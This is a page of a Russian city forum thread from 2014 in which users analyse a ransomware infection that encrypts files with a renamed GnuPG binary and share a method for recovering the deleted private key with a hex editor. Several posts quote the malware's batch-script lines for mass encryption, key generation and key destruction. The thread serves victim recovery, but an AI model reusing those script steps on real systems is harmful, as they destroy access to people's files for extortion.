Ярпортал в Телеграм

Поиск

Правила Yarportal.Ru

Политика обработки персональных данных

Здравствуйте, Гость ( Вход·Регистрация )

Сделать Yarportal.Ru стартовой страницей

Ярпортал, форум Ярославля -> Форумы для ярославцев -> Авто-Ярославль

Страницы: (17) « Первая ... 5 6 [7] 8 9 ... Последняя » ( Перейти к первому непрочитанному сообщению )

Вирус, небольшой оффтоп

Подписка на тему | Версия для печати

EWiZaRD

Дата 3.06.2014 - 08:14

Unregistered

Цитата (goom @ 2.06.2014 - 17:40)

В моём случае фалы *.doc, xls не тронуты

Да не успел просто

Вирус создает cptbase.cmd, в котором перечислены все файлы, что будут зашифрованы и начинает его выполнять.

Код

svchost.exe -r unstyx --yes --trust-model always --no-verbose -q --encrypt-files "C:\Users\All Users\Autodesk\Inventor Fusion 2013\Design Data\Thread.xls" & move /y "C:\Users\All Users\Autodesk\Inventor Fusion 2013\Design Data\Thread.xls.gpg" "C:\Users\All Users\Autodesk\Inventor Fusion 2013\Design Data\Thread.xls" & RENAME "C:\Users\All Users\Autodesk\Inventor Fusion 2013\Design Data\Thread.xls" "Thread.xls.unstyx@gmail_com"

На том компе, что я смотрел, размер cptbase.cmd - 137 мегов

Вирус успел зашифровать все файлы на C: (>33000 файлов) и частично на USB диске, к счастью, не успев добраться до сетевого диска.

Это сообщение отредактировал EWiZaRD - 3.06.2014 - 09:32

blessk	Дата 3.06.2014 - 09:59
Unregistered	http://virusinfo.info/showthread.php?t=160669&p=1121723

mouseTPAKTOPuCT

Дата 3.06.2014 - 10:49

Unregistered

Цитата (fawkes999 @ 3.06.2014 - 05:53)

Цитата (mouseTPAKTOPuCT @ 3.06.2014 - 00:48)

аа. так это тот чепушилко, который впаривал макеты втридорого

А я все жду ящик таких гранат, п@здабол

Влез в тему, насмешил всех, выставил себя идиотом...

я тебе там всё ответил

видимо слишком уж еге на тебя повлияло раз не понял

fawkes999

Дата 3.06.2014 - 11:03

Unregistered

Цитата (mouseTPAKTOPuCT @ 3.06.2014 - 11:49)

Цитата (fawkes999 @ 3.06.2014 - 05:53)

Цитата (mouseTPAKTOPuCT @ 3.06.2014 - 00:48)

аа. так это тот чепушилко, который впаривал макеты втридорого

А я все жду ящик таких гранат, п@здабол

Влез в тему, насмешил всех, выставил себя идиотом...

я тебе там всё ответил

видимо слишком уж еге на тебя повлияло раз не понял

Да что-то я помню, что по ценообразованию ответили как-раз тебе, выставив полным идиотом

А я все жду ящик подобных болванок за 100руб

Это сообщение отредактировал fawkes999 - 3.06.2014 - 11:05

fawkes999

Дата 3.06.2014 - 11:13

Unregistered

Цитата (ТО)(@ @ 3.06.2014 - 00:00)

Вот это что ли?

У меня как-то подобный индивид в ВК хотел два ТТ настоящих купить, собирался по почте заказать

А уж вопросов, боевая или нет десятки...

Это сообщение отредактировал fawkes999 - 3.06.2014 - 11:14

goom

Дата 3.06.2014 - 13:46

Unregistered

Цитата (EWiZaRD @ 3.06.2014 - 09:14)

Цитата (goom @ 2.06.2014 - 17:40)

В моём случае фалы *.doc, xls не тронуты

Да не успел просто

Вирус создает cptbase.cmd, в котором перечислены все файлы, что будут зашифрованы и начинает его выполнять.

Код

На том компе, что я смотрел, размер cptbase.cmd - 137 мегов

Вирус успел зашифровать все файлы на C: (>33000 файлов) и частично на USB диске, к счастью, не успев добраться до сетевого диска.

Как говорят, мгновенно изменилось расширение файла, на съемных носителях и раб.столе. Допускаю, что процесс шифрования всё еще запущен. Посмотрим.

EWiZaRD

Дата 3.06.2014 - 14:22

Unregistered

Если есть сомнения, лучше перегрузиться.
А так, смотреть в %TEMP% наличие svchost.exe (переименованый gpg.exe) и cpD.bin.
cpD.bin, похоже, по смыслу, "все уже сделано, запускаться не надо".

Код

if exist "%TEMP%\cpD.bin" goto jump2
echo 1>"%TEMP%\cpD.bin"
cd "%TEMP%"
RENAME "%TEMP%\svchost.cry" "svchost.exe"
if exist "%TEMP%\svchost.cry" RENAME "svchost.cry" "svchost.exe"
if NOT exist "%TEMP%\svchost.exe" goto jump2

jump2 - выход из скрипта cde.cmd

ryab_i4

Дата 3.06.2014 - 15:47

Unregistered

Цитата (EWiZaRD @ 2.06.2014 - 14:28)

Итак, как развивались события (опуская бесполезные методы и подходы

)

Файл в составе вируса, создающий и удаляющий ключи - cde.cmd, из него нам интересно:

%SCV%%PRB%--import "%TEMP%\secrypt.cry"
%SCV%%PRB%--homedir "%TEMP%" --batch --gen-key genkey.cry
%SCV%%PRB%-r StyxKey --yes --trust-model always --no-verbose -q --encrypt-files "%TEMP%\secring.gpg"
...
move /y "%TEMP%\secring.gpg.gpg" "%TEMP%\secring.gpg"
RENAME "%TEMP%\secring.gpg" KEY.PRIVATE

т.е. ключ действительно создается каждый раз (--gen-key) и потом зашифровывается (--encrypt-files) уже безвозвратно.
secring.gpg после этого перезаписывается мусором и просто так его не востановить.

Файл genkey.cry удалось восстановить из удаленных (R-Studio или аналогичная). Его содержимое:
%pubring pubring.gpg
%secring secring.gpg
Key-Type: RSA
Key-Length: 1024
Name-Real: unstyx
Name-Comment: unstyx
Name-Email: unstyx@mail2tor.com
Expire-Date: 0
Passphrase: unstyx

Что сделал я:
1.Поставил себе gnupg (лучше бы наверное ту же верию 1.4, что и в вирусе, но поставил 2.2).
2.Сгенерил три пары ключей пользуясь genkey.cry как файлом параметров. Файл secring.gpg трижды оказался длиной 739 байт и вначале у каждого была сигнатура 0х95 0x01. Также в файле в открытом виде лежит email (unstyx@mail2tor.com).
3.Скачал disk editor, запустил поиск unstyx@mail2tor.com.
Оп-па, второе же вхождение имеет 0x95 0x01 вначале и окружено 0x00. Копируем этот блок в новый файл - 738 байт. Почти-почти, может версия играет роль 2.2 vs 1.4. Кладем файл под именем secring.gpg в каталог GnuPG.

gpg2 -K:
C:/Users/EWiZaRD/AppData/Roaming/gnupg/secring.gpg
------------------------------------------------------
sec 1024R/6C1328AF 2014-06-02
uid unstyx (unstyx) <unstyx@mail2tor.com>

Есть секретный ключ, мы уже рядом

gpg2 --output "1.rar" --decrypt "1.rar.unstyx@gmail_com"
вводим пароль (unstyx из genkey.cry) и ТА-ДА!
1.rar снова с нами.

Далее дело техники. unstyx.cmd:
@echo off
for %%I in (*.unstyx@gmail_com) do (
gpg2 --output "%%~nI" --decrypt "%%I"
del "%%I"
)

sweep unstyx и можно открывать шампанское, принесенное благодарным пользователем

P.S. добавлением всего двух команд в cde.cmd можно сделать так, чтобы этот и подобные подходы не сработали, но я не такой дурак, чтобы говорить об этом вслух

)

Здравствуйте!
У нас диск разбит на 2 раздела, первый раздел мы форматнули (переустановили винду), а на разделе 2 остались зашифрованые нужные файлы, как уже потом выяснилось.
Теперь пытаемся найти с помощью R-Studio файлик genkey.cry на первом (форматнутом разделе) и все без успешно

И я так понял что без генерации в gnupg по вашему рецепту ничего не получится, не достаточно будет просто найденого genkey.cry?

Что посоветуете, ждать дешифратор или еще какой-нибудь выход есть?

P.S. платить вымогателям не предлагать, ибо нефиг их кормить.

EWiZaRD	Дата 3.06.2014 - 16:00
Unregistered	Если genkey.cry такой же, какой был у нас, то его искать не надо. Надо поставить какой-нибудь disk editor (не на тот раздел, на котором будем искать!), я поставил первый попавшийся, HxD Hex Editor, и запустить поиск по диску. Искать строчку unstyx@mail2tor.com, в блоке начинающемся на 0x95 0x01. Хотя, если переставили Windows (создание большого кол-ва файлов), то шансы невелики. Это сообщение отредактировал EWiZaRD - 3.06.2014 - 16:00

ryab_i4

Дата 3.06.2014 - 17:09

Unregistered

Цитата (EWiZaRD @ 3.06.2014 - 16:00)

Если genkey.cry такой же, какой был у нас, то его искать не надо. Надо поставить какой-нибудь disk editor (не на тот раздел, на котором будем искать!), я поставил первый попавшийся, HxD Hex Editor, и запустить поиск по диску. Искать строчку unstyx@mail2tor.com, в блоке начинающемся на 0x95 0x01.

Хотя, если переставили Windows (создание большого кол-ва файлов), то шансы невелики.

Я так понял искать нужно по 2 разделу в самих зашифрованых файлах или по диску 1 раздел, который был отформатирован?
И как искать в блоках не понял, в HEX редакторе смещения другого вида (в шестнадцатеричном формате) со строкой все понятно. Текстовая строка?

Потом нужен gnupg для генерации?

EWiZaRD	Дата 3.06.2014 - 18:01
Unregistered	Искать по диску. Текстовая. Если найдете, то потом gnupg нужен для расшифровки. Это сообщение отредактировал EWiZaRD - 3.06.2014 - 18:04

ryab_i4

Дата 3.06.2014 - 22:57

Unregistered

Цитата (EWiZaRD @ 3.06.2014 - 16:00)

в блоке начинающемся на 0x95 0x01.

Никак не могу разобраться как в блоках искать и где эти блоки, а диск открыл.
Вижу только смещения в шестнадцатиричном, десятичном или восьмеричном виде (переключается). Не понятно как найти эти адреса 0x95 0x01? Я их не вижу нигде.

Опыта работы в HEX редакторах не было
Воспользовался тоже HxD Hex Editor'ом. Подскажите пожалуйста!

Beirut	Дата 4.06.2014 - 03:26
Yarportal.Ru Профиль Группа: Администратор Сообщений: 209601 Пользователь №: 2 Регистрация: 18.03.2003 - 03:51	аж от трех человек пришло письмо. прочитав первое, пришлось звонить, узнавать. хорошо, что архивированный файл подозрительный. каракулями и мало весит. натурально пишут. "из 5 налоговой", "срочно" он всего лишь файлы блокирует? думал, раз ЦА - офисный люд. пароли от банковских систем ворует

EWiZaRD	Дата 4.06.2014 - 07:05
Unregistered	0x95 0x01 это не смещение, а сигнатура начала файла secring.gpg Искать на диске unstyx@mail2tor.com, строку, а потом смотреть есть ли эти байты чуть выше. Вот файл, что я вытащил с диска: Пр просмотре диска этот блок был окружен 0x00 Это сообщение отредактировал EWiZaRD - 4.06.2014 - 07:06

shoosha	Дата 4.06.2014 - 09:29
Группа умных альпинистов обошла гору Эверест! Профиль Группа: Пользователи Сообщений: 447 Пользователь №: 55108 Регистрация: 1.08.2010 - 18:44	Заплатили, прислали ключ, прога вернула все обратно, все расшифровалось, комп перезагрузился, файлы открылись (почти все, но не все, некоторые побились). Осталось вычистить следы пребывания этой гадости, выискать файлы и удалить... прогнать антивирусниками, хотя не поможет.

« | Авто-Ярославль | »

Страницы: (17) « Первая ... 5 6 [7] 8 9 ... Последняя »

[ Время генерации скрипта: 0.0117 ] [ Использовано запросов: 16 ] [ GZIP включён ]

Используя Yarportal.Ru, вы соглашаетесь с Правилами Yarportal.Ru и Политикой обработки персональных данных.

Все вопросы: yaroslavl@bk.ru